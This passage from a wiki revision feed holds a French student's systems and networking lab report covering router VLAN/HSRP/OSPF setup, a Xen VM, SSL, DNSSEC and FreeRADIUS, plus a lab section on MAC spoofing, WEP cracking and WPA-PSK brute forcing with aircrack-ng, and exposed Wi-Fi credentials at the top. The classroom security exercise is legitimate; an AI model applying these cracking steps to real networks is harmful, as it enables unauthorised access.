    wpa-identity NirkasHunt3r&lt;br /&gt;
    wpa-password Phil.ze.beat&lt;br /&gt;
    address 172.20.106.6&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 172.20.106.254&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'arrive à accéder à n'importe quelle adresse de mon réseau. Cependant je n'arrive pas à aller sur internet.&lt;br /&gt;
&lt;br /&gt;
Cela est résolu grâce à cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
wget http://193.48.57.34/dns&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nickel ! Tout fonctionne !&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23396</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23396"/>
				<updated>2015-11-27T14:06:01Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;1&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;default&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.99.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
Pour cela j'installe aircrack.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install aircrack-ng&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Modification du fichier /etc/apt/sources.list : &lt;br /&gt;
rajout de contrib non-free&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/network/interfaces : &lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static &lt;br /&gt;
     address 172.20.106.6&lt;br /&gt;
     netmask 255.255.255.0&lt;br /&gt;
     gateway 172.20.106.254&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/resolv.conf : &lt;br /&gt;
nameserver 193.48.57.34&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install firmware-linux-nonfree&lt;br /&gt;
apt-get remove network-manager&lt;br /&gt;
apt-get install broadcom-sta-dkms&lt;br /&gt;
modprobe wl&lt;br /&gt;
modprobe -r b44 b43 b43legacy ssb brcmsmac&lt;br /&gt;
modprobe -r wl&lt;br /&gt;
modprobe wl*dmseg&lt;br /&gt;
dmseg&lt;br /&gt;
ifconfig -a &lt;br /&gt;
reboot&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
code :&lt;br /&gt;
airmon -ng start wlan1 ==&amp;gt; cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin&lt;br /&gt;
soltion : apt-get install firmware-ralink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0&lt;br /&gt;
&lt;br /&gt;
Je ré-ouvre une mon0.&lt;br /&gt;
&lt;br /&gt;
J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.&lt;br /&gt;
&lt;br /&gt;
Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.&lt;br /&gt;
&lt;br /&gt;
Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)&lt;br /&gt;
&lt;br /&gt;
code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.&lt;br /&gt;
&lt;br /&gt;
Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va commencer par créer un dictionnaire  de clé : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main (void)&lt;br /&gt;
{&lt;br /&gt;
    int i=0;&lt;br /&gt;
    while(i&amp;lt;100000000)&lt;br /&gt;
    {&lt;br /&gt;
        printf(&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
        i++;&lt;br /&gt;
    }&lt;br /&gt;
    return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite récupérer le handshake :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
df&lt;br /&gt;
fdisk -l&lt;br /&gt;
mkfs /dev/sda1&lt;br /&gt;
mount /dev/sda1 /mnt&lt;br /&gt;
cp handshake-01.cap /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que le fichier est sur pifou, je lance le traitement :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w dico.txt handshake-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : Connexion sur Weppes puis ssh root@193.57.48.183&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je commence par installer sur la machine virtuellepostfix et bsd-mailx :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install postfix&lt;br /&gt;
vim /etc/aliases ==&amp;gt; rajout d'une ligne admin:   root&lt;br /&gt;
newaliases&lt;br /&gt;
apt-get install mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. &lt;br /&gt;
&lt;br /&gt;
En utilisant &amp;quot;p&amp;quot; je peux l'afficher.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Sécurisation de site web par certificat&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant je vais réclamer mon certificat : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Je vais sur le site de gandi&lt;br /&gt;
Je clique sur Certificat SSL qui est actuellement inactif&lt;br /&gt;
Je vais dans la FAQ et je cherche comment générer une CSR ? &lt;br /&gt;
Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM&lt;br /&gt;
Country Name (2 letter code) [AU]: FR&lt;br /&gt;
State or Province Name (full name) [Some-State]: Nord&lt;br /&gt;
Locality Name (eg, city) []: Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille&lt;br /&gt;
Organizational Unit Namec SSLCertificateChainFile.  (eg, section) []: &lt;br /&gt;
Common Name (eg, YOUR name) []: hunt3r.lol&lt;br /&gt;
Email Address []: admin@hunt3r.lol&lt;br /&gt;
A challenge password []: &lt;br /&gt;
An optional company name []:&lt;br /&gt;
Il me génère donc deux fichiers, le .csr et le .key&lt;br /&gt;
J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.&lt;br /&gt;
&lt;br /&gt;
Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)&lt;br /&gt;
Je valide ma demande grâce au code reçu dans ma boite mail hunt3r et j'attends le certificat.&lt;br /&gt;
Une fois reçu je crée un fichier Werewolf.cer et je colle le certificat que j'ai récupéré.&lt;br /&gt;
Même chose pour les certificats intermédiaire.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je peux commencer alors la configuration d'apache2 avec mon certificat :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cd /etc/apache2/sites-available&lt;br /&gt;
vim default-ssl.conf&lt;br /&gt;
                SSLCertificateFile      /root/Werewolf.cer&lt;br /&gt;
                SSLCertificateKeyFile /root/Werewolf.key&lt;br /&gt;
                #SSLCertificateChainFile /root/WerewolfInter.cer&lt;br /&gt;
&lt;br /&gt;
3 commandes me permettent de mettre en route le tout :&lt;br /&gt;
a2ensite default-ssl&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
service apache2 restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait, lorsque je vais sur ma page internet je remarque je peux y aller à la fois normalement c'est à dire en écrivant : http://www.hunt3r.lol/ mais aussi en utilisant la connexion sécurisée : https://www.hunt3r.lol/. On remarque qu'avec l'https on a bien un cadenas.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Sécurisation de serveur DNS par DNSSEC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cd /etc/bind&lt;br /&gt;
vim named.conf.options ==&amp;gt; rajout de l'option dnssec-enable yes;&lt;br /&gt;
mkdir hunt3r.dnssec&lt;br /&gt;
cd hunt3r.dnssec&lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE -r /dev/urandom hunt3r.dnssec&lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -n ZONE -r /dev/urandom hunt3r.dnssec&lt;br /&gt;
Je renomme les fichiers créé en : &lt;br /&gt;
    *hunt3r-ksk.key&lt;br /&gt;
    *hunt3r-ksk.private&lt;br /&gt;
    *hunt3r-zsk.key&lt;br /&gt;
    *hunt3r-zsk.private&lt;br /&gt;
J'inclus dans le fichier db.hunt3r : &lt;br /&gt;
    *$include /etc/bind/hunt3r.dnssec/hunt3r-ksk.key&lt;br /&gt;
    *$include /etc/bind/hunt3r.dnssec/hunt3r-zsk.key&lt;br /&gt;
dnssec-signzone -o hunt3r.lol -k hunt3r-ksk ../db.hunter hunt3r-zsk&lt;br /&gt;
Modification du fichier named.conf.local  ==&amp;gt; db.hunt3r.signed&lt;br /&gt;
service bind9 restart&lt;br /&gt;
Copie de la clé KSK sur le site de gandi dans l'onglet gérer DNSSEC&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;br /&gt;
&lt;br /&gt;
Arrivée au partitionnement :&lt;br /&gt;
&lt;br /&gt;
J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. &lt;br /&gt;
Nom du miroir de l'archive Debian : debian.polytech-lille.fr&lt;br /&gt;
Mandataire HTTP : http://proxy.polytech-lille.fr:3128&lt;br /&gt;
Logiciels à installer : Xfce, service SSH  et utilitaies usuels du système (à valider à l'aider de la barre espace)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Sécurisation Wifi par WPA2-EAP &amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant je vais m'attaquer à la protection de l'accès à la borne Wifi de façon à ce qu'il soit controlé par WPA2-EAP. &lt;br /&gt;
Pour cela je me connecte à ma VM et je réalise la configuration:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install FreeRadius&lt;br /&gt;
cd /etc/bind/freeradius&lt;br /&gt;
Modification de 3 fichiers :&lt;br /&gt;
vim eap.conf&lt;br /&gt;
    default-eap-type = peap&lt;br /&gt;
vim client.conf&lt;br /&gt;
    client 172.20.99.0/24&lt;br /&gt;
    {&lt;br /&gt;
       secret = secret_Werewolf&lt;br /&gt;
       shortname = wifi&lt;br /&gt;
    }&lt;br /&gt;
vim users &lt;br /&gt;
On enlève les commentaires au niveau de John Doe et de son mot de passe, de cette façon on aura un utilisateur.&lt;br /&gt;
&lt;br /&gt;
telnet 172.20.99.5&lt;br /&gt;
&lt;br /&gt;
aaa authentication login eap_Werewolf group radius_Werwolf&lt;br /&gt;
radius-server host 193.48.57.8 auth-port 1812 acct-port 1813 key secret_Werewolf&lt;br /&gt;
aaa group server radius radius_Werwolf&lt;br /&gt;
server 193.48.57.8 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
dot11 ssid SSID_WEREWOLF&lt;br /&gt;
  vlan 8&lt;br /&gt;
  authentication open eap eap_Werewolf&lt;br /&gt;
  authentication network-eap eap_Werewolf&lt;br /&gt;
  authentication key-management wpa&lt;br /&gt;
&lt;br /&gt;
encryption vlan 8 mode ciphers aes-ccm tkip&lt;br /&gt;
&lt;br /&gt;
ssid SSID_WEREWOLF&lt;br /&gt;
int dot11Radio 0.8&lt;br /&gt;
en &lt;br /&gt;
encapsulation dot1Q 8&lt;br /&gt;
bridge-group 8&lt;br /&gt;
exit       &lt;br /&gt;
int gig0.8&lt;br /&gt;
en&lt;br /&gt;
encapsulation dot1Q 8&lt;br /&gt;
bridge-group 8&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23166</id>
